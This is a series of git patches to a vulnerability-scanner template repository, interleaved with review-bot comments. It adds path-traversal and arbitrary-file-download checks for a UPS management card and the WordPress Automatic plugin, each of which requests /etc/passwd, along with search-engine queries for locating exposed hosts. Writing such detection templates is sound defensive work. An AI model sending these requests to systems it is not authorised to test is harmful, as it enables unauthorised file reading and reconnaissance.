@@ -5134,6 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 +http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb +templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9b16d8e79707b4f706c7c4369912e55cd7615fc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:47:25 +0000 Subject: [PATCH 60/86] Auto Template Signing [Thu Mar 21 07:47:25 UTC 2024] :robot: --- http/misconfiguration/installer/drupal-install.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 282cedeb23..734fee7e5b 100644 --- a/http/misconfiguration/installer/drupal-install.yaml 
+++ b/http/misconfiguration/installer/drupal-install.yaml
@@ -23,4 +23,4 @@ http:
 - type: word
 words:
 - "Choose language | Drupal"
-# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
From 9a10b14360ea16d8b49200c3fedefee8c9c10b41 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Thu, 21 Mar 2024 11:21:05 -0400
Subject: [PATCH 61/86] ups lfi add
---
.../other/ups-network-lfi.yaml | 37 +++++++++++++++++++
1 file changed, 37 insertions(+)
create mode 100644 http/vulnerabilities/other/ups-network-lfi.yaml
diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml
new file mode 100644
index 0000000000..849a2a4d87
--- /dev/null
+++ b/http/vulnerabilities/other/ups-network-lfi.yaml
@@ -0,0 +1,37 @@
+id: ups-network-lfi
+
+info:
+ name: UPS Network Management Card 4 Path Traversal
+ author: Kazgangap
+ severity: high
+ description: |
+ UPS Network Management Card version 4 suffers from a path traversal vulnerability.
+ reference:
+ - https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt
+ - https://www.exploit-db.com/exploits/51897
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: html:"UPS Network Management Card 4"
+ tags: ups,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+
+ - type: status
+ status:
+ - 200
From 153d08d97ce8e43bda411f5935f5cd07bb43d0fb Mon Sep 17 00:00:00 2001
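Review bot: The new template carries `severity: high` but no `classification:` block, so it records no CWE; other templates in this series have one (PATCH 63 shows `classification:` with `cwe-id: CWE-522`), and `cwe-id: CWE-22` is the path-traversal entry that fits here. The `reference:` entries are a packetstorm and an exploit-db advisory, yet `tags: ups,lfi` omits the `packetstorm` and `edb` tags that the CVE-2012-4253 template in PATCH 50 carries next to `lfi`, so tag-based selection would skip this template; `tags: ups,lfi,packetstorm,edb` would follow that convention. The `description` also does not say what the traversal yields (the body matcher shows an arbitrary file read), which a reader needs to judge the rating.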
From: Ricardo Maia
Date: Thu, 21 Mar 2024 23:23:39 -0300
Subject: [PATCH 62/86] Add Directus Detect
---
http/technologies/directus-detect.yaml | 30 ++++++++++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 http/technologies/directus-detect.yaml
diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml
new file mode 100644
index 0000000000..91767c6618
--- /dev/null
+++ b/http/technologies/directus-detect.yaml
@@ -0,0 +1,30 @@
+id: directus-detect
+
+info:
+ name: Directus - Detect
+ author: ricardomaia
+ severity: info
+ description: |
+ Directus is a content manager with dynamic access API generation and transparent integration with the main databases.
+ reference:
+ - https://directus.io/
+ metadata:
+ max-request: 1
+ google-query: intitle:directus "Not Authenticated"
+ verified: true
+ tags: tech,directus,detect
+
+http:
+ - method: GET
+ stop-at-first-match: true
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 1
+ matchers:
+ - type: word
+ case-insensitive: true
+ part: header
+ words:
+ - "X-Powered-By: Directus"
From 318211f55b0f7769ce4331b6ff96f6c7044ae34b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com>
Date: Fri, 22 Mar 2024 12:24:04 +0800
Subject: [PATCH 63/86] tag add
---
http/default-logins/alibaba/canal-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/default-logins/alibaba/canal-default-login.yaml b/http/default-logins/alibaba/canal-default-login.yaml
index 30838d3b88..e3f11bed1e 100644
--- a/http/default-logins/alibaba/canal-default-login.yaml
+++ b/http/default-logins/alibaba/canal-default-login.yaml
@@ -13,7 +13,7 @@ info:
 cwe-id: CWE-522
 metadata:
 max-request: 1
- tags: alibaba,default-login
+ tags: canal,alibaba,default-login
 http:
 - raw: 
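Review bot: `stop-at-first-match: true` has no effect here because the request lists a single `path` entry, so it can be dropped from the request block. The `description` describes the product rather than the finding; the other detection templates in this series phrase it as a result (PATCH 55 uses `description: |` followed by `SoftEther VPN panel was detected.`), so `Directus was detected.` would match. The only matcher is the `X-Powered-By: Directus` header, which a hardened deployment may strip; the `google-query` hints that the `Not Authenticated` page text could serve as a second fingerprint, though that is an extension to consider rather than a defect.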
From 6405d33af9f23be45dddecb8ba18bd4d9cf41225 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:33:10 +0000 Subject: [PATCH 65/86] Auto Generated Templates Checksum [Fri Mar 22 07:33:10 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1eb6877577..d127627215 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5133,7 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 -http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 +http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 
@@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb -javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 +javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c +templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e1bb9d7d85824378d721f07c1fb01be1a848eb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:34:51 +0000 Subject: [PATCH 66/86] Auto Template Signing [Fri Mar 22 07:34:51 UTC 2024] :robot: --- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index e7326fd2cf..926ccba63a 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml 
@@ -61,4 +61,4 @@ javascript:
 - 'contains(interactsh_protocol, "dns")'
 - 'contains(interactsh_request, response)'
 condition: and
-# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
From 08dc5c90c719016bdacd116a3228664310c5d5bc Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 22 Mar 2024 13:07:25 +0530
Subject: [PATCH 67/86] update-workflow
---
 workflows/default-application-workflow.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml
index 03b65efc24..42b418ab7f 100644
--- a/workflows/default-application-workflow.yaml
+++ b/workflows/default-application-workflow.yaml
@@ -4,6 +4,7 @@ info:
 name: Default Web Application Detection
 author: andydoering
 description: Detects default installations of web applications
+
 workflows:
 - template: http/technologies/apache/default-apache-test-all.yaml
@@ -23,7 +24,7 @@ workflows:
 - template: http/technologies/default-django-page.yaml
- - template: http/exposures/files/drupal-install.yaml
+ - template: http/misconfiguration/installer/drupal-install.yaml
 - template: http/technologies/oracle/default-oracle-application-page.yaml
From c37769da01b0ac4def0c3779676b47367c6c4b8f Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 22 Mar 2024 07:41:50 +0000
Subject: [PATCH 68/86] Auto Generated Templates Checksum [Fri Mar 22 07:41:50 UTC 2024] :robot:
---
 templates-checksum.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index d127627215..05fe547af1 100644
--- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb -javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d +javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65 +templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 
@@ -8215,7 +8215,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d -workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb +workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139 workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5 workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779 From a0315e64cb0bf97d4b4f465bc909d4dc81084fa1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:44:53 +0000 Subject: [PATCH 70/86] Auto Generated Templates Checksum [Fri Mar 22 07:44:53 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 05fe547af1..243017a1a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
@@ -3112,7 +3112,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f -http/default-logins/alibaba/canal-default-login.yaml:2c0e5475e64363fb8ec6f6748768c09a9da193de +http/default-logins/alibaba/canal-default-login.yaml:7c9308b40deec5c04c4f140ee21a5d7be7a24525 http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26 +templates-checksum.txt:3e2acfb1564de13ccdeacca4c94b6b4733ef0b79 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3fcda12c44c235e09586fd929c37fa60fbe28f71 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:46:39 +0000 Subject: [PATCH 71/86] Auto Template Signing [Fri Mar 22 07:46:39 UTC 2024] :robot: --- http/default-logins/alibaba/canal-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/alibaba/canal-default-login.yaml b/http/default-logins/alibaba/canal-default-login.yaml index e3f11bed1e..40cf08b22a 100644 
--- a/http/default-logins/alibaba/canal-default-login.yaml
+++ b/http/default-logins/alibaba/canal-default-login.yaml
@@ -42,5 +42,4 @@ http:
 words:
 - 'data":{"token"'
 - '"code":20000'
-
-# digest: 4a0a004730450220126d880af62775003a5b6029ad39aead9272e2a61bdaab710e896acf665d7064022100caa03f9b85633bd64fce0925f23720ac678e539c93355165426ed68a982d820e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100dcf09580a68dde8267efb45c71a519054938eaa0f8389934c19a69f945ecbd73022010071bf196c1b070ee79de3c48c4227e6834381e641b486b2059ace96d8257d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
From 5341db94990d9b08e716f1be418130f89a868705 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 22 Mar 2024 13:21:38 +0530
Subject: [PATCH 72/86] minor update
---
 http/technologies/directus-detect.yaml | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)
diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml
index 91767c6618..1b70af7072 100644
--- a/http/technologies/directus-detect.yaml
+++ b/http/technologies/directus-detect.yaml
@@ -10,21 +10,18 @@ info:
 - https://directus.io/
 metadata:
 max-request: 1
- google-query: intitle:directus "Not Authenticated"
+ google-query: 'X-Powered-By: Directus'
 verified: true
 tags: tech,directus,detect
 http:
 - method: GET
- stop-at-first-match: true
 path:
 - "{{BaseURL}}"
- host-redirects: true
- max-redirects: 1
 matchers:
 - type: word
- case-insensitive: true
 part: header
 words:
 - "X-Powered-By: Directus"
+ case-insensitive: true
From 6b95b67b09049c798dd163811d2330c2b2c77ffe Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 22 Mar 2024 21:03:04 +0530
Subject: [PATCH 73/86] Create CVE-2024-27954.yaml
---
 http/cves/2024/CVE-2024-27954.yaml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-27954.yaml
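Review bot: The new `google-query: 'X-Powered-By: Directus'` is a response-header string, which Google search does not index, so the `intitle:` dork it replaces was the only form of this metadata a reader could actually run; if a header search on Shodan or a similar engine was intended, the key should be the matching one (e.g. `shodan-query`), otherwise a title- or body-based dork belongs here. Removing `host-redirects: true` and `max-redirects: 1` also means the header is now only inspected on the first response, so a host that redirects to the Directus app before emitting it will no longer match; if that narrowing is deliberate, a one-line comment such as `# header is checked on the initial response only; redirects are intentionally not followed` would stop the next editor from re-adding them. Moving `case-insensitive: true` below `words` is purely cosmetic. The enclosing `info:` and `http:` blocks start outside the hunk.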
diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml
new file mode 100644
index 0000000000..523bf191fb
--- /dev/null
+++ b/http/cves/2024/CVE-2024-27954.yaml
@@ -0,0 +1,30 @@
+id: CVE-2024-27954
+
+info:
+ name: WordPress Automatic plugin - Arbitrary File Download and SSRF
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ Unauthenticated Arbitrary File Download and SSRF. Located in the downloader.php file, this vulnerability also discovered by Rafie Muhammad, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. Thankfully, this vulnerability too has been patched in version 3.92.1.
+ reference:
+ - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
+ tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf
+
+http:
+ - raw:
+ - |
+ GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"link":"file:'
+
+ - type: word
+ part: body
+ words:
+ - 'root:x:0:0:root:'
From 0e6e1450ec9c762ad0776bf24081e7b296aa9049 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 22 Mar 2024 21:13:51 +0530
Subject: [PATCH 74/86] Update CVE-2024-27954.yaml
---
 http/cves/2024/CVE-2024-27954.yaml | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml
index 523bf191fb..9f9c4505d4 100644
--- a/http/cves/2024/CVE-2024-27954.yaml
+++ b/http/cves/2024/CVE-2024-27954.yaml
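Review bot: The first `reference:` entry ends in `#google_vignette`, which is an ad-overlay fragment the browser appended and not part of the article URL; trim it to `- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/` so the link is stable and tooling that de-duplicates references does not treat it as a distinct URL. The later patches in this series that rewrite the `info:` block carry the same fragment unchanged, so it needs fixing once here. The rest of the metadata gaps in this first version (classification, metadata) are addressed by the follow-up commits and need no further comment.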
@@ -1,14 +1,19 @@
 id: CVE-2024-27954
 info:
- name: WordPress Automatic plugin - Arbitrary File Download and SSRF
+ name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
 author: iamnoooob,rootxharsh,pdresearch
 severity: critical
 description: |
- Unauthenticated Arbitrary File Download and SSRF. Located in the downloader.php file, this vulnerability also discovered by Rafie Muhammad, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. Thankfully, this vulnerability too has been patched in version 3.92.1.
+ WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
 reference:
 - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
+ classification:
+ cve-id: CVE-2024-27954
+ metadata:
+ max-request: 1
+ verified: true
 tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf
 http:
From 2b09b301f44aa9d1c5b0e6cdd7dc17fcc0747791 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 22 Mar 2024 21:20:43 +0530
Subject: [PATCH 75/86] added metadata
---
 http/cves/2024/CVE-2024-27954.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml
index 9f9c4505d4..fb78070d09 100644
--- a/http/cves/2024/CVE-2024-27954.yaml
+++ b/http/cves/2024/CVE-2024-27954.yaml
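Review bot: The rewritten `description:` runs two sentences into one without a subject ("...and SSRF Located in the downloader.php file, could permit attackers..."), and this wording survives to the final version of the file in this series. Suggested text for that line: `WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated arbitrary file download and SSRF. The flaw, located in downloader.php, could permit an unauthenticated attacker to download any file from the site, including files containing credentials or backups. This vulnerability has been patched in version 3.92.1.` The `classification:` block introduced here only carries `cve-id`; the CWE and score are added by a later commit and are not re-raised. The enclosing `info:` block continues past the hunk.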
@@ -14,7 +14,8 @@ info:
 metadata:
 max-request: 1
 verified: true
- tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf
+ publicwww-query: "/wp-content/plugins/wp-automatic/"
+ tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
 http:
 - raw:
From aa45bd2e0f11540d86a9ec7d26b9ffe4edd430fe Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 22 Mar 2024 21:22:57 +0530
Subject: [PATCH 76/86] updated matcher & info
---
 http/cves/2024/CVE-2024-27954.yaml | 21 +++++++++++----------
 1 file changed, 11 insertions(+), 10 deletions(-)
diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml
index fb78070d09..cd4f2864c7 100644
--- a/http/cves/2024/CVE-2024-27954.yaml
+++ b/http/cves/2024/CVE-2024-27954.yaml
@@ -7,21 +7,23 @@ info:
 description: |
 WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
 reference:
+ - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
 - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
 classification:
- cve-id: CVE-2024-27954
+ cvss-score: 9.8
+ cwe-id: CWE-918
+ cve-id: CVE-2022-1970
 metadata:
 max-request: 1
 verified: true
- publicwww-query: "/wp-content/plugins/wp-automatic/"
+ publicwww-query: "/wp-content/plugins/wp-automatic"
 tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
 http:
- - raw:
- - |
- GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
- Host: {{Hostname}}
+ - method: GET
+ path:
+ - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
 matchers-condition: and
 matchers:
@@ -30,7 +32,6 @@ http:
 words:
 - '"link":"file:'
- - type: word
- part: body
- words:
- - 'root:x:0:0:root:'
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
From be511088a6b2b35a13f42c009310064020022759 Mon Sep 17 00:00:00 2001
From: "[PDBot]"
Date: Fri, 22 Mar 2024 16:05:42 +0000
Subject: [PATCH 77/86] Auto Generated New Template Addition List [Fri Mar 22 16:05:42 UTC 2024] :robot:
---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 47df011d4e..31c093cbae 100644
--- a/.new-additions
+++ b/.new-additions
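Review bot: The first hunk replaces the correct `cve-id: CVE-2024-27954` with `cve-id: CVE-2022-1970`, which contradicts the template's `id`, its name, and both CVE references; this looks like a copy-paste from another template's classification block and will mislabel every finding exported from this template. Restore `cve-id: CVE-2024-27954` (the signing commit later in this series digests the file with the wrong id, so the digest would need regenerating after the fix). The new `cvss-score: 9.8` is also given without the `cvss-metrics` vector that the other classification blocks in this repository carry alongside a score; add the vector from the referenced advisory rather than the bare number. The enclosing `info:` block starts outside the hunk.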
